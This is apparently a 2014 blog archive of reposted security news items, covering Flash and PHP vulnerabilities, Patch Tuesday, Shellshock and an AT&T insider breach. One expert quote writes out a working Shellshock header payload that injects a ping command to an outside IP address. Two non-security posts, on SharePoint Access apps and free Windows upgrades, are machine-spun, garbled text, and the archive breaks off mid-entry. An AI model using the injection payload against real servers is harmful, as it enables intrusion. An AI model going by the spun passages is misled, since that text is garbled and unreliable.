Recently Patched Flash Player Vulnerability Added to Exploit Kit
Posted on October 23, 2014 by Kara Dunlap in Security
An exploit for a Flash Player vulnerability that was patched just over one week ago by Adobe has already been added by cybercriminals to an exploit kit.
The French malware researcher know as “Kafeine” was the one who first noticed the integration of the exploit for CVE-2014-0569, a Flash Player integer overflow flaw that could lead to arbitrary code execution, into the Fiesta exploit kit. The expert made the discovery while trying to analyze a different Flash vulnerability (CVE-2014-0556).
The vulnerability was reported to Adobe privately through HP’s Zero Day Initiative (ZDI) program so everyone is wondering how the cybercriminals managed to get their hands on the exploit in such a short period of time.
Kafeine told SecurityWeek that he believes the cybercriminals reverse engineered the patch released by Adobe to build their exploit.
“The criminals built this vulnerability into an exploit kit in record time. Whether they were given a heads-up, or just have a highly skilled reverse engineer, both scenarios are equally worrisome as it increases the possible window of infection,” Jerome Segura, senior security researcher from Malwarebytes Labs, told SecurityWeek. “Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications. Browsing the net on an unpatched computer is like playing Russian roulette with a handful of loaded guns.”
“The bad guys are not going to run short of vulnerabilities they can weaponize, and if this happens at a quicker rate than ever before, their success rate will increase. This leaves end users with very little room for mistakes, such as failing to diligently apply security patches sooner rather than later,” Segura added.
Initially, Kafeine believed the exploit for CVE-2014-0569 was integrated into the Angler exploit kit as well, but in an update made to his original blog post, the researcher noted that the exploit included in Angler actually appears to be for a different Flash vulnerability patched by Adobe last week.
In the case of the Angler exploit kit, the first payload that’s distributed is Bedep (detected by Malwarebytes as Trojan.FakeMS.ED), which enrolls infected computers into a botnet. The final payload is a variant of the notorious Zeus banking Trojan, Kafeine said.
Both the Fiesta and Angler exploit kits are popular among cybercriminals. Angler was recently involved in a malvertising campaign targeting several high-profile websites, including Java.com.
PHP 5 Updates Fix Several Security Vulnerabilities
Posted on October 20, 2014 by Kara Dunlap in Security
PHP released last week versions 5.6.2, 5.5.18 and 5.4.34 of the scripting language. In addition to some functionality bugs, the latest releases address a series of security-related flaws.
According to the PHP development team, a total of four vulnerabilities have been fixed in PHP 5.6 and PHP 5.5, and six flaws in PHP 5.4.
One of the security bugs, CVE-2014-3669, is a high-severity integer overflow vulnerability in PHP’s “unserialize()” function. When the function is used on untrusted data, the flaw could lead to a crash or information disclosure. It’s unclear at this point if arbitrary code execution is also possible, says an advisory for this bug published on the Red Hat Bugzilla website. The issue only affects 32-bit systems.
Another vulnerability fixed by PHP has been assigned the CVE identifier CVE-2014-3668. The medium-severity security hole, which is caused by an out-of-bounds read flaw in the “mkgmtime()” function, could lead to a crash of the PHP interpreter.
CVE-2014-3669 and CVE-2014-3668 were reported to PHP in September by a researcher from Geneva, Switzerland-based IT security firm High-Tech Bridge.
Otto Ebeling, a software engineer at Facebook, reported a bug that causes heap corruption when parsing the thumbnail of a specially crafted .jpg image. This heap corruption affecting the “exif_thumbnail()” function has been assigned CVE-2014-3670.
“PHP provides APIs such as exif_thumbnail that can be used to extract embedded thumbnails from various image formats. In the process of extracting a TIFF-formatted EXIF thumbnail from a JPEG image, PHP re-encodes most IFD tags present in the thumbnail directory and prepends them to the thumbnail image in order to produce a standalone TIFF file,” Ebeling wrote in his report. “Individual values are re-encoded using the exif_ifd_make_value function. If this function is asked to write out an array of floating point values (single or double precision), it erroneously uses the size of the whole array when copying individual elements using memmove, leading to heap corruption.”
“To exploit a target application that uses this API (or exif_read_data with suitable parameters), a malicious user can trigger this condition by supplying a tag that contains an array of floating-point values, and futher tags that indicate the presence of a TIFF thumbnail. The image itself need not be valid as long as the exif_ifd_make_value gets invoked,” the expert explained.
According to Ebeling, the affected code is also included in the open-source virtual machine HHVM.
PHP 5.4, 5.5 and 5.6 users are advised to update their installations as soon as possible. Additional information on the fixes is available in the changelogs.
Researchers Hide Android Applications in Image Files
Posted on October 17, 2014 by Kara Dunlap in Security
AMSTERDAM – BLACK HAT EUROPE – Researchers have found a way to trick Android users into executing potentially malicious applications by hiding them inside innocent-looking image files.
Axelle Apvrille, mobile/IoT malware analyst and researcher at Fortinet, and Ange Albertini, reverse engineer and author of Corkami.com, have created an application that can be used to encrypt an APK to make it look like a PNG image file.
In a real attack leveraging this method, the attacker sends an application containing an image to the potential victim. When the app is launched, the victim only sees the harmless-looking image. In the background however, a malicious payload is installed onto the victim’s Android device.
In order to hide the installation of the malicious payload, the attacker can leverage the DexClassLoader constructor, the experts said.
According to the researchers, the method works on Android 4.4.2 and prior versions of the operating system. Google developed a fix for the flaw back in June, but Apvrille told SecurityWeek in an interview that the fix is incomplete. The researchers have informed Google of this and the company is now working on a more efficient fix.
How does it work?
The attacker writes his malicious payload and encrypts it to make it look like a valid PNG image file. The encryption is done with AngeCryption, an application developed by the researchers.
Controlling AES encryption can be a difficult task, but AngeCryption is designed to encrypt the APK so that Android doesn’t see any difference. Furthermore, the resulting image looks normal to users, except for the fact that it’s 500Kb in size, which is a bit much for a small resolution image.
The final step is to create a wrapping APK in which the malicious PNG is inserted, and then decrypted and installed.
When Android APKs are written, they must end with an End of Central Directory (EOCD) marker. The researchers managed to add their specially crafted PNG file to the APK by appending it after the first EOCD and adding a second EOCD at the end.
Massive Oracle Security Update Lands on Microsoft Patch Tuesday
Posted on October 15, 2014 by Kara Dunlap in Security
Microsoft and Oracle customers will have their hands full applying a spate of security updates that were issued today.
Microsoft released eight security bulletins as part of Patch Tuesday, including critical updates for Internet Explorer, Windows and the .NET Framework. The bulletins address a total of 24 vulnerabilities, including a handful that is known to have already come under attack.
But the Microsoft release is dwarfed in size by the more than 150 security fixes issued today by Oracle. Within those patches are 31 fixes for the Oracle Database, several of which have a CVSS Base Score of 9.0.
“This CVSS 9.0 Base Score reflects instances where the user running the database has administrative privileges (as is typical with pre-12 Database versions on Windows),” explained Oracle Software Security Assurance Director Eric Maurice in a blog post. “When the database user has limited (or non-root) privilege, then the CVSS Base Score is 6.5 to denote that a successful compromise would be limited to the database and not extend to the underlying Operating System. Regardless of this decrease in the CVSS Base Score for these vulnerabilities for most recent versions of the database on Windows and all versions on Unix and Linux, Oracle recommends that these patches be applied as soon as possible because a wide compromise of the database is possible.”
The Oracle update also provides fixes for 25 new Java SE vulnerabilities, the most severe of which has a CVSS Base Score of 10.0. Out of the 25, 20 affect client-only deployments of Java SE, and two of these are browser specific. Four vulnerabilities meanwhile affect client and server deployments of Java SE, while on affects client and server deployments of JSSE, Maurice noted.
The remaining vulnerabilities impact: Oracle Fusion Middleware; Oracle Enterprise Manager Grid Control; Oracle E-Business Suite; Oracle Supply Chain Product Suite; Oracle PeopleSoft Enterprise; Oracle JDEdwards EnterpriseOne; Oracle Communications Industry Suite; Oracle Retail Industry Suite; Oracle Health Sciences Industry Suite; Oracle Primavera; Oracle and Sun Systems Product Suite; Oracle Linux and Virtualization and Oracle MySQL.
In the case of Microsoft, customers will have their hands full with issues of their own. Three of the bulletins released today by Microsoft are rated ‘critical’ – MS14-056, MS14-057 and MS14-058.
MS14-056 is the biggest of the updates, and addresses 14 privately-reported issues in Internet Explorer. The most severe of these could allow remote code execution of a user views a specially-crafted webpage using Internet Explorer.
“This is another Patch Tuesday that easily fuels future drive-by web attacks for the months ahead,” said Marc Maiffret, CTO of BeyondTrust. “Beyond just code execution there also exists the ability to bypass ASLR (Address Space Layout Randomization) which is a helpful OS security migration for exploitation. This ASLR bypass can be used in conjunction with other vulnerabilities for more successful exploitation where it had might not been possible in the past. It should be noted that Microsoft’s EMET technology will help mitigate some of these attacks and even more importantly these client application vulnerabilities are a great reminder of the need for Least Privilege in making sure users are not running as Administrator.”
MS14-56, he said, should be prioritized first, with the remaining critical updates coming next. MS14-058 contains fixes for two issues in Windows that are already known to be under attack.
“The more severe of the vulnerabilities could allow remote code execution if an attacker convinces a user to open a specially crafted document or to visit an untrusted website that contains embedded TrueType fonts,” according to Microsoft. “In all cases, however, an attacker would have no way to force users to perform these actions. Instead, an attacker would have to persuade users to do so, typically by getting them to click a link in an email message or Instant Messenger message.”
The final critical bulletin is MS14-057, which addresses vulnerabilities in the .NET Framework. According to Microsoft, the most severe of these could allow remote code execution if an attacker sends a specially-crafted URI request containing international characters to a .NET web application. In .NET 4.0 applications, the vulnerable functionality (iriParsing) is disabled by default; for the vulnerability to be exploitable an application has to explicitly enable this functionality. In .NET 4.5 applications, iriParsing is enabled by default and cannot be disabled.
The remaining bulletins are rated ‘Important’ and cover issues in Microsoft Windows, Developer Tools and Microsoft Office.
Adobe Systems also released patches today to address issues in Adobe Flash Player.
“Adobe is releasing an update to their Flash player with advisory APSB14-22, which addresses three RCE [remote code execution] type vulnerabilities,” blogged Qualys CTO Wolfgang Kandek. “Installations that run the newer Internet Explorer 10 and 11 get this update automatically. Users of older browsers or on other operating systems should apply this critical update manually.”
Advantages and drawbacks regarding the Access Application for SharePoint 2013
Posted on October 14, 2014 by Kara Dunlap in SharePoint
Tags: SharePoint 2013
Enterprise Personal & Collaboration
Why are Accessibility 2013 Apps Great? Below tend to be a couple of elements …
They’ve a SQL online host backend
You can use SQL online server Reporting Solutions, Excel or any other products that uphold SQL Azure or SQL internet host over ODBC to create reports regarding the Access Application information
Once you utilize App Layouts or Tables, places as well as navigation are produced available
There are some new relevant Product commands which make framework views effortless and they have a constant appearance and feel
One Click Production!
The appearance capability is created in and also is user-friendly
What tend to be SharePoint 2013 Apps?
It enables designers to develop custom-made applications that would be released toward Workplace shop for general public download or even to the organization mag which can be a business’s internal Application Brochure Site after that users can download all of them with their SharePoint web pages. Included in the out-of-box apps is an Accessibility Application which makes it easy for Access 2013 data resources to be included to SharePoint 2013 internet sites.
Precisely what may be the Access App?
This out-of-box, no-code application allows us to put Gain access to data resources into SharePoint and comes with some really great functions (step-by-step over) that I will truly get involved in slightly more specific within the next parts. The event of the application will be provide a much more dependable, quicker also durable option for placing relational information directly into SharePoint with no issue of creating including creating one thing from the floor up. Microsoft Office get access to 2013 includes a few themes for Accessibility internet Apps along with tables which will get you began.
Top Get Access To App Work
It’s an incredible dissimilar to generating an inventory in SharePoint whenever you comprehend it will increase to-be a “large listing”. Not only does it help deal with big directories including provide fast option of the information, it also enables outside SQL Server including SQL Azure suffered resources getting option of the data.
Want to know just how it works?
When you produce the application in Microsoft Workplace Access 2013, you decide on the internet site where it will definitely live.
In the process introducing the program to SharePoint, a SQL database is provisioned that may house all the items and data that application requires.
The database that’s produced is particular to your application also automatically maybe not shown other programs.
Once you develop a table within application, a table is created inside repository.
Once you generate a question within app, a SQL host Sight is produced or if perhaps your inquiry takes a parameter, a table-valued function is developed.
Whenever you produce a Standalone Macro within application, a Stored treatment is done in SQL online server.
Sights in Accessibility will be the the different parts of your app that show the information within the internet browser. They’re in addition kept in the information supply but as message simply because tend to be HTML and JavaScript as opposed to SQL items.
Other Really Fantastic Benefits which can be Well Worth Mentioning
When establishing the get access to Application, you are able to choose from one of several easy as really as quick templates or start from scratch amongst a personalized software. That’s it, in just a couple of ticks you have got an operating SharePoint Application. Either technique, once you’ve in fact designed your database, mouse click release Application and also you have actually a no-code software in SharePoint that consist of a search device.
It makes it possible for designers to create custom applications that can be posted to your Office Establishment for community down load or even the Corporate Catalog that is a business’s interior Application mag Site then users can install all of them to their SharePoint internet sites. Consisted of within the out-of-box apps is an Accessibility App that makes it easy for Accessibility 2013 information resources become put into SharePoint 2013 web pages.
Microsoft Workplace Access 2013 comprises of a few themes for Accessibility online Applications and tables that undoubtedly acquire you started.
When building the Access App, you’ll pick from among simple as well as fast design templates or start from scrape with a personalized application. Regardless, once you’ve made your database, mouse click Introduce Application including you’ve got a no-code software in SharePoint that features a search device.
By Amy Sawtell, December 10, 2013
Source: http://www.cardinalsolutions.com/cardinal/blog/portals/2013/12/the_pros_and_consof.html
The future of Microsoft depends upon Windows being free of cost
Posted on October 13, 2014 by Kara Dunlap in Microsoft Windows
The worth of OS upgrades has actually been entirely shed in a time where we’re useded to getting complimentary updates to cell phones as long as they can continuously deal with the software program. Why does this same design not apply to the PC yet? Microsoft has taken on cost-free upgrades for Windows Phone already, so why not for the COMPUTER?
Microsoft has remained peaceful on what its prepare for Windows rates in future, yet did make it free of cost for customers to update from Windows 8 to 8.1 as well as we understand the upgrade from 8 to 10 will be free, however will this proceed? The company lately revealed Windows 10 however didn’t detail whether it would be an additional free upgrade or otherwise; nevertheless, it probably should be a totally free upgrade for a lot of Windows customers.
It requires to decouple the business and consumer markets if Microsoft wishes to preserve it’s iron hold on the future COMPUTER market. It’s entirely sensible to expect businesses to pay to authorized software– even if just to get extended updates as well as assistance– yet expecting completion individual to care sufficient to invest over $100 to update every 2 years is absurd.
For lots of consumers, Windows upgrades are straight tied to when they change their COMPUTER’s. Why else would certainly numerous individuals not also bother to update from XP? Their PC’s are flawlessly efficient in running Windows 7, however why would they wish to pay $130 merely to obtain the most up to date software application? Change could be tough and instead of troubling to pay and also upgrade for a new permit, these customers have actually chosen to remain on unsupported versions due to the fact that it ‘works’ fine.
Making Windows complimentary has a variety of tangible perks for Microsoft; not just does it urge customers to update frequently (and takes out mostly all barriers to doing so), it suggests that users are more likely to make use of the most up to date version of Microsoft products and connected services. It additionally means that Microsoft could eliminate all the perplexing and also needless SKU options and concentrate on 2 markets: consumer and venture.
Envision Windows 10 was made free of cost for all users from Vista as well as up– the install base would rapidly move to the latest variation (similar to OS X users, or iOS users flock to the latest release), suggesting less heritage support for Microsoft and the capacity to promote bigger numbers. The firm might simply have a different version and a demand for those using Windows in company situations.
Because it’s cost-free for numerous residence users to obtain the most recent model of Windows, it seems likely that these exact same users would be much more about to spend for associated services using registration as an alternative, like OneDrive or Office365, which would certainly total up to a lot a lot more repeating profits for the company.
I anticipate that Microsoft has actually already pertained to this same, unpreventable verdict and will certainly make Windows 10 complimentary for those utilizing Windows 7 as well as up. It’s most likely a tough choice for the company– Windows is a $5 Billion a year business– yet it’s a crucial one, that it has to make in order to stay appropriate.
As less and fewer PC’s are sold each year, the business should look for various other methods to generate income by offering assisting solutions on a longer term basis as opposed to attempting to persuade individuals to dip the money on an upgrade every three years.
Consumers simply aren’t purchasing brand-new computers any longer as they last longer or change to depending phones as well as tablet computers, so Microsoft has to seek brand-new means of obtaining revenue, beyond Windows. Windows will become the conduit for consumers to acquire Microsoft solutions.
The days of paid Windows upgrades have fulfilled their end, even if Microsoft hasn’t already confessed it.
Photo credit history: Getty Images
There are a few slots left for our UX Style program. Get your own today.
Keep in mind the days when you would certainly move out to the shop to select up the most current variation of Windows, on DVD, for something like $130? Those days could appear in the remote past, yet in truth Microsoft is still charging for upgrades between significant models also as of Windows 8.1.
Microsoft has taken on free of cost upgrades for Windows Phone already, so why not for the PC?
For several consumers, Windows upgrades are directly linked to when they replace their COMPUTER’s. Their COMPUTER’s are completely capable of running Windows 7, yet why would certainly they wish to pay $130 simply to obtain the most recent software?
- By Owen Williams, thenextweb.com
- View First
WordPress is the Most Attacked CMS: Report
Posted on October 12, 2014 by Kara Dunlap in Security
Data security firm Imperva released its fifth annual Web Application Attack report (WAAR) this week, a study designed track the latest trends and cyber threats facing web applications.
The report, which is based on the analysis of 99 applications over a period of nine months (August 1, 2013 – April 30, 2014), determined that WordPress is the most targeted content management system (CMS). In fact, WordPress websites were attacked 24.1% more than sites running on all other CMS platforms combined.
“WordPress has been in the headlines, in the past couple of years, both because of its popularity, and because of the amount of vulnerabilities found in its application and exposed by hackers. We believe that popularity and a hacker’s focus go hand-in-hand. When an application or a platform becomes popular, hackers realize that the ROI from hacking into these platforms or applications will be fruitful, so they spend more time researching and exploiting these applications, either to steal data from them, or to use the hacked systems as zombies in a botnet,” the report reads.
This year’s WAAR also makes a comparison between attacks targeting PHP and .NET applications. It turns out that PHP apps suffer almost three times more cross-site scripting (XSS) attacks than ASP applications, and nearly two times more directory traversal attacks. On the other hand, Imperva has determined that ASP applications suffer twice as many SQL injection attacks than PHP applications.
When it comes to websites, unsurprisingly, ones that have login functionality and implicitly store consumer-specific information are the most targeted.
Nearly half of all the attacks observed by Imperva during the nine month period targeted the retail sector, followed at a distance by financial institutions which accounted for 10% of all Web application attacks.
Compared to the previous period reviewed by the company (June 1, 2012 – November 30, 2012), attacks have been 44% longer. A 10% increase was also observed in SQL injection attacks, and a 24% increase in remote file inclusion (RFI) attacks.
As far as attack sources are concerned, Imperva found that the United States generates most of the Web application attack traffic.
“In our educated opinion, based on years of analyzing attack data and origins, we propose that attackers from other countries are using U.S. hosts to attack, based on those hosts being geographically closer to targets,” the report reads.
“While this may be overwhelming, we believe that there is more to this picture. Attacks originating in the U.S. may indicate other things such as TOR exit nodes, Botnet infected machines, etc., and so this information needs to be looked at in proportion. What it potentially teaches us is the quality of targets. It makes sense for an attacker to execute the attack as close to the target as possible, to remain undetected or to maximize the available bandwidth of the attack.”
Attackers are increasingly leveraging cloud and infrastructure-as-a-service (IaaS) hosted applications and servers. Imperva has found that 20% of all known vulnerability exploitation attempts and 10% of all SQL injection attempts originated in Amazon Web Services (AWS) source IPs.
The complete Web Application Attack report from Imperva is available here.
Yahoo! Changes Tune After Saying Servers Were Hacked By Shellshock
Posted on October 7, 2014 by Kara Dunlap in Security
On Monday afternoon, Yahoo confirmed to SecurityWeek that servers associated with Yahoo Games had been hacked as a result of the recently disclosed “Shellshock” vulnerability, but has since said its original conclusion was wrong.
In its original statement issued Monday afternoon, the company said that on Sunday night, a “handful” of its servers were impacted but said there was no evidence of a compromise to user data.
Hours later, Yahoo! Contacted SecurityWeek with a change in tune, saying that after all, the servers in question were NOT compromised via the Shellshock vulnerability, but rather a “minor bug in a parsing script”.
“Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by Shellshock. After investigating the situation fully, it turns out that the servers were in fact no affected directly by Shellshock, but by a minor bug in a parsing script,” a Yahoo! Spokesperson told SecurityWeek. “Regardless of the cause, our course of action remained the same — to isolate the servers at risk and protect our users’ data.”
The company maintained its position that no evidence has been found suggesting that user information was affected by the incident.
Yahoo! CISO, Alex Stamos provided additional details in a post to Y Combinator’s Hacker News.
“Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers,” Stamos explained. “These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.
Stamos, who became VP of Information Security and CISO at Yahoo! in March 2014, continued:
“As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected!
The original story with more background on the incident can he found here.
AT&T Admits Insider Illegally Accessed Customer Data
Posted on October 6, 2014 by Kara Dunlap in Security
AT&T is advising customers that a rogue employee illegally accessed their personal information.
In a breach notification letter sent to customers and the Vermont attorney general, AT&T explained the breach occurred in August. The employee responsible is no longer with the company.
According to the letter, the employee was able to view and may have accessed customer information ranging from social security numbers to driver’s license numbers. In addition, while accessing user accounts, the employee would have been able to view their Customer Proprietary Network Information (CPNI) without authorization. CPNI data is associated with services customers purchase from AT&T.
It is not clear how many customers were affected by the breach or if consumers in other states may have been involved.
“AT&T’s commitments to customer privacy and data security are top priorities, and we take those commitments seriously,” according to the letter.
“Simply stated, this is not the way we conduct business, and as a result, this individual no longer works here,” the letter notes.
AT&T is offering affected consumers a year of free credit monitoring, and said in the letter that any unauthorized changes that had been made to accounts would be reversed. The company has contacted federal law enforcement as well.
Earlier this year, employees of one of AT&T’s service providers accessed customer information without authorization as well. According to AT&T, the perpetrators in that case were trying to gather information that could be used to request codes to unlock AT&T mobile phones so that they could be used with other telecommunications providers.
“Insiders are worse than hackers because there’s no way to protect against them that’s truly effective,” opined Jonathan Sander, strategy and research officer for STEALTHbits Technologies. “If you need to do business, you need people to access information. If the wrong person or the person in the wrong frame of mind decides to use that access badly, what can you do?”
“This proves, yet again, that humans are the weakest link in any security plan,” he added. “It’s the old IT administrator joke about a system error called PEBKAC – Problem Exists Between Keyboard And Chair.”
Feedback Friday: ‘Shellshock’ Vulnerability – Industry Reactions
Posted on September 28, 2014 by Kara Dunlap in Security
The existence of a highly critical vulnerability affecting the GNU Bourne Again Shell (Bash) has been brought to light this week. The security flaw is considered by some members of the industry as being worse than the notorious Heartbleed bug.
GNU Bash is a command-line shell used in many Linux, Unix and Mac OS X operating systems. The vulnerability (CVE-2014-6271) has been dubbed “Bash Bug” or “Shellshock” and it affects not only Web servers, but also Internet-of-Things (IoT) devices such as DVRs, printers, automotive entertainment systems, routers and even manufacturing systems.
By exploiting the security hole, an attacker can execute arbitrary commands and take over targeted machine. Symantec believes that the most likely route of attack is through Web servers that use CGI (Common Gateway Interface). There have already been reports of limited, targeted attacks exploiting the vulnerability.
A patch has been made available, but it’s incomplete. Until a permanent fix is rolled out, several organizations have launched Shellshock detection tools. Errata Security has started scanning the Web to find out how many systems are affected, and Symantec has published a video to demonstrate how the flaw can be exploited.
The security community warns that the vulnerability can have serious effects, and points out that it could take a long time until all systems are patched.
And the Feedback Begins…
Ian Pratt, Co-founder and EVP at Bromium:
“The ‘shellshock’ bash vulnerability is a big deal. It’s going to impact large numbers of internet-facing Linux/Unix/OS X systems as bash has been around for many years and is frequently used as the ‘glue’ to connect software components used in building applications. Vulnerable network-facing applications can easily be remotely exploited to allow an attacker to gain access to the system, executing with the same privilege the application has. From there, an attacker would attempt to find a privilege escalation vulnerability to enable them to achieve total compromise.
Bash is a very complex and feature-rich piece of software that is intended for interactive use by power users. It does way more than is typically required for the additional role for which it is often employed in gluing components together in applications. Thus it presents an unnecessarily broad attack surface — this likely won’t be the last vulnerability found in bash. Application developers should try to avoid invoking shells unless absolutely necessary, or use minimalist shells where required.”
Mark Parker, Senior Product Manager at iSheriff:
“This bash vulnerability is going to prove to be a much bigger headache than Heartbleed was. In addition to the general Mac OS X, Linux and Unix systems that need to be patched, there are also thousands upon thousands of Internet connected Linux and Unix based embedded devices, such as DVRs, home automation systems, automotive entertainment systems, mobile phones, home routers, manufacturing systems and printers.
Most of these devices will be susceptible because most Linux based devices run bash, it is such an integral part of the Linux OS. I anticipate that we will be continue to see the fallout from this vulnerability for a long time to come.”
Carl Wright, General Manager of TrapX Security:
“We feel that industry will take this very seriously and come out with patches for this vulnerability ASAP. It could take us years to understand how many systems were compromised and how many were used to escalate privileges into systems without this vulnerability. The transitive trust nature of directory architectures and authentications systems could mean we are living with this far beyond patching the current systems if this exploit has been taken advantage of even at a small 1% level.”
Coby Sella, CEO of Discretix:
“This is the second time over the last six months when a key infrastructure component used by billions of connected things across a variety of industries has been compromised. We see this problem only getting worse as more and more unsecured or not adequately secured things are rolled out without any comprehensive security solution that reaches all the way down to the chipset. Real solutions to this problem must cover every layer from the chipset to the cloud enabling companies to remotely insert secrets into the chipset layer via secured connections within their private or cloud infrastructure.”
Nat Kausik, CEO, Bitglass:
“Enterprises with ‘trusted endpoint’ security models for laptops and mobile devices are particularly vulnerable to this flaw. Malware can exploit this vulnerability on unix-based laptops such as Mac and Chromebook when the user is away from the office, and then spread inside the corporate network once the user returns to the office.”
Steve Durbin, Managing Director of the Information Security Forum:
“The Bash vulnerability simply stresses the point that there is no such thing as 100% security and that we all need to take a very circumspect and practical approach to how we make use of the devices that we use to share data both within and outside the home and our businesses. I have my doubts on whether or not this will lead to a wave of cyber-attacks, but that is not to say that the vulnerability shouldn’t be taken seriously. It is incumbent upon all of us as users to guard our data and take all reasonable precautions to ensure that we are protecting our information as best as we are realistically able.”
Steve Lowing, Director of Product Management, Promisec:
“Generally, the Bash vulnerability could be really bad for systems, such as smart devices including IP cameras, appliances, embedded web servers on routers, etc… which are not updated frequently. The exposure for most endpoints is rapidly being addressed in the form of patches to all flavors of UNIX including Redhat and OS X. Fortunately for Microsoft, they avoid much of this pain since most Windows systems do not have Bash installed on them.
For vulnerable systems, depending on how they are leveraging the Bash shell the results could be grave. For example, a webserver that uses CGI for example would likely be configured to use Bash as the shell for executing commands and compromising this system via this vulnerability is fairly straightforward. The consequences could be to delete all web content which could mean Service level agreements (SLA)s are not met because of complete outage or deface the site which tarnishes your brand or even to be a point of infiltration for a targeted attack which could mean IP and/or sensitive customer information loss.
The IoT is the likely under the biggest risk since many of these devices and appliances are not under subject to frequent software updates like a desktop or laptop or server would be. This could result in many places for an attacker to break into and lay wait for sensitive information to come their way.”
Jason Lewis, Chief Collection and Intelligence Officer, Lookingglass Cyber Solutions:
“The original vulnerability was patched by CVE-2014-6271. Unfortunately this patch did not completely fix the problem. This means even patched systems are vulnerable.
Several proof of concepts have been released. The exploit has the ability to turn into a worm, so someone could unleash an exploit to potentially infect a huge number of hosts.”
Ron Gula, Chief Executive Officer and Chief Technical Officer, Tenable Network Security:
“Auditing systems for ShellShock will not be like scanning for Heartbleed. Heartbleed scans could be completed by anyone with network access with high accuracy. With ShellShock, the highest form of accuracy to test for this is to perform a patch audit. IT auditing shops that don’t have mature relationships with their IT administrators may not be able to audit for this.
Detecting the exploit of this is tricky. There are network IDS rules to detect the attack on unencrypted (non-SSL) web servers, but IDS rules to look for this attack over SSL or SSH won’t work. Instead, solutions which can monitor the commands run by servers and desktops can be used to identify commands which are new, anomalistic and suspect.”
Mike Spanbauer, Managing Director of Research, NSS Labs:
“Bash is an interpretive shell that makes a series of commands easy to implement on a Unix derivative. Linux is quite prevalent today throughout the Web, both as commerce platform and as commercial website platform. It happens to be the default script shell for Unix, Linux, well… you get the picture.
The core issue is that while initially the vulnerability highlights the ease with which an attacker might take over a Web server running CGI scripting, and ultimately, ‘get shell’ which offers the attacker the means to reconfigure the access environment, get to sensitive data or compromise the victim machine in many ways.
As we get to the bottom of this issue, it will certainly be revealed just how bad this particular discovery is – but there is a chance it’s bigger than Heartbleed, and that resulted in thousands of admin hours globally applying patches and fixes earlier this year.”
Contrast Security CTO and co-founder Jeff Williams:
“This is a pretty bad bug. The problem happens because bash supports a little used syntax for ‘exported functions’ – basically a way to define a function and make it available in a child shell. There’s a bug that continues to execute commands that are defined after the exported function.
So if you send an HTTP request with a referrer header that looks like this: Referer:() { :; }; ping -c 1 11.22.33.44. The exported function is defined by this crazy syntax () { :; }; And the bash interpreter will just keep executing commands after that function. In this case, it will attempt to send a ping request home, thus revealing that the server is susceptible to the attack.
Fortunately there are some mitigating factors. First, this only applies to systems that do the following things in order: 1) Accept some data from an untrusted source, like an HTTP request header, 2) Assign that data to an environment variable, 3) Execute a bash shell (either directly or through a system call).
If they send in the right data, the attacker will have achieved the holy grail of application security: ‘Remote Command Execution.’ An RCE basically means they have completely taken over the host.
Passing around data this way is a pretty bad idea, but it was the pattern back in the CGI days. Unfortunately, there are still a lot of servers that work that way. Even worse, custom applications may have been programmed this way, and they won’t be easy to scan for. So we’re going to see instances of this problem for a long long time.”
Tal Klein, Vice President of Strategy at Adallom:
“What I don’t like to see is people comparing Shellshock to Heartbleed. Shellshock is exponentially more dangerous because it allows remote code execution, meaning a successful attack could lead to the zombification of hosts. We’ve already seen one self-replicating Shellshock worm in the wild, and we’ve already seen one patch circumvention technique that requires patched Bash to be augmented in order to be ‘truly patched’. What I’m saying is that generally I hate people who wave the red flag about vulnerabilities, but this is a 10 out of 10 on the awful scale and poses a real threat to core infrastructure. Take it seriously.”
Michael Sutton, Vice President of Security Research at Zscaler:
“Robert Graham has called the ‘Shellshock’ vulnerability affecting bash ‘bigger than Heartbleed.’ That’s a position we could defend or refute, it all depends upon how you define bigger. Will more systems be affected? Definitely. While both bash and OpenSSL, which was impacted by Heartbleed, are extremely common, bash can be found on virtually all *nix system, while the same can’t be said for OpenSSL as many systems simply would require SSL communication. That said, we must also consider exploitability and here is where I don’t feel that the risk posed by Shellshock will eclipse Heartbleed.
Exploiting Heartbleed was (is) trivially easy. The same simple malformed ‘heartbeat’ request would trigger data leakage on virtually any vulnerable system. This isn’t true for Shellshock as exploitation is dependent upon influencing bash environment variables. Doing so remotely will depend upon the exposed applications that interact with bash. Therefore, this won’t quite be a ‘one size fits all’ attack. Rather, the attacker will first need to probe servers to determine not only those that are vulnerable, but also how they can inject code into bash environment variables.
The difference here is that we have to take application logic into account with Shellshock and that was not required with Heartbleed. That said, we’re in very much in the same boat having potentially millions of vulnerable machines, many of which will simply never be patched. Shellshock, like Heartbleed, will live on indefinitely.”
Mamoon Yunus, CEO of Forum Systems:
“The Bash vulnerability has the potential to be much worse than Heartbleed. Leaking sensitive data is obviously bad but the Bash vulnerability could lead to losing control of your entire system.
The Bash vulnerability is a prime example of why it’s critical to take a lockdown approach to open, free-for-all shell access, a practice that is all too common for on-premise and cloud-based servers. Mobile applications have caused an explosion in the number of services being built and deployed. Such services are hosted on vanilla Linux OS variants with little consideration given to security and are typically close to the corporate edge. Furthermore, a large number of vendors use open Linux OSes, install their proprietary functionality, and package commercial network devices that live close to the network edge at Tier 0. They do so with full shell access instead of building a locked-down CLI for configuration.
The Bash vulnerability is a wake-up call for corporations that continue to deploy business functionality at the edge without protecting their services and API with hardened devices that do not provide a shell-prompt for unfettered access to OS internals for anyone to exploit.”
Jody Brazil, CEO of FireMon:
“This is the kind of vulnerability that can be exploited by an external attacker with malicious intent. So, how do those from the Internet, partner networks or other outside connection gain access to this type of exposure?
An attack vector analysis that considers network access through firewalls and addresses translation can help identify which systems are truly exposed. Then, determine if it’s possible to mitigate the risk by blocking access, even temporarily. In those cases where this is not an option, prioritizing patching is essential. In other cases where, for example, where there is remote access to a vulnerable system that is not business-critical, access can be denied using existing firewalls.
This helps security organizations focus their immediate patching efforts and maximize staffing resources. It’s critical to identify the greatest risk and then prioritize remediation activities accordingly. Those are key best practices to address Bash or any vulnerability of this nature.”
Mark Stanislav, Security Researcher at Duo Security:
